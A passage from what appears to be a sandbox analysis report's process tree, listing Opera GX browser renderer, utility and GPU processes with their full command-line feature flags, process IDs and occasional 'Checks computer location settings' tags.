--ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6900,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7008 /prefetch:12⤵
- Checks computer location settings
PID:11812
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=7384,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7368 /prefetch:82⤵PID:10876
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=7316,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8236 /prefetch:12⤵PID:10020
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=8400,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8360 /prefetch:12⤵PID:9680
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --extension-process --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=700,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8384 /prefetch:22⤵PID:7272
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=7420,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6188 /prefetch:12⤵PID:9196
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=6796,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6880 /prefetch:12⤵
- Checks computer location settings
PID:1428
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=8096,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7236 /prefetch:82⤵PID:9880
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=7784,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8164 /prefetch:12⤵
- Checks computer location settings
PID:2024
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=8732,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8728 /prefetch:12⤵
- Checks computer location settings
PID:11952
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --field-trial-handle=5196,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7604 /prefetch:12⤵PID:11808
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --field-trial-handle=8764,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8640 /prefetch:12⤵PID:6764
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=8716,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:12⤵PID:9700
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=9088,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=8612 /prefetch:12⤵PID:11004
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --field-trial-handle=9148,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=6368 /prefetch:12⤵PID:11108
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=6392,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7780 /prefetch:12⤵PID:6728
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=5968,i,7878070381127762500,5051561209566159226,262144 --variations-seed-version --mojo-platform-channel-handle=7052 /prefetch:12⤵
- Checks computer location settings
